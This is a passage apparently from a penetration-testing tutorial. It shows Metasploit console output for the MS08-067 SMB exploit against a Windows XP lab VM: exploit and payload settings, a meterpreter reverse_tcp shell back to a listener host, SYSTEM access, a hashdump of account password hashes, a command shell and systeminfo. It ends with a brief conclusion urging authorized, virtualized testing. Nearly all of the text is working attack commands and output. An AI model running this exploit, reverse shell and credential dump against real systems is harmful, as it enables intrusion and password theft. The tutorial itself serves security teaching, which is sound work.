Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.103   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.56.1     yes       The listen address
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (751104 bytes) to 192.168.56.103
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.103:1079) at 2013-06-18 22:14:33 +0300
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter > sysinfo
Computer        : WINDOWSX-C7B000
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4b96c75b8d843a7ae69de05670f84236:d9178fd3b70a6bb945b5f1b67c6bf645:::
IUSR_WINDOWSX-C7B000:1004:7a68662f527f18a87dfe407d970d780e:199fc7a3f00b00d8da81a66e4507e55b:::
IWAM_WINDOWSX-C7B000:1005:27ffb5fdfeafa462d92e514086f08077:954f0124f93780ce8d43ffcda157a567:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:603e6ae218ff6a77a3d7c9a519b93df7:::
windowsxp:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > shell
Process 1908 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWSsystem32>systeminfo
systeminfo
Host Name:                 WINDOWSX-C7B000
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 2 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          windowsxp
Registered Organization:
Product ID:                76487-640-8365391-23703
Original Install Date:     6/10/2013, 1:02:40 PM
System Up Time:            0 Days, 2 Hours, 4 Minutes, 1 Seconds
System Manufacturer:       innotek GmbH
System Model:              VirtualBox
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 58 Stepping 9 GenuineIntel ~2484 Mhz
BIOS Version:              VBOX   - 1
Windows Directory:         C:WINDOWS
System Directory:          C:WINDOWSsystem32
Boot Device:               DeviceHarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     511 MB
Available Physical Memory: 370 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,009 MB
Virtual Memory: In Use:    39 MB
Page File Location(s):     C:pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: AMD PCNET Family PCI Ethernet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.56.103

Conclusion

There are a lot of ways and things we can do to enumerate and exploit vulnerable web-apps or services. This tutorial describes the basic things we can do to gather important information and exploit the most known vulnerable services using a couple of ways. The best secure way is to try every parameter on a virtual environment, before proceeding to run every of the above example, to real machine Servers with authorized access by the admin.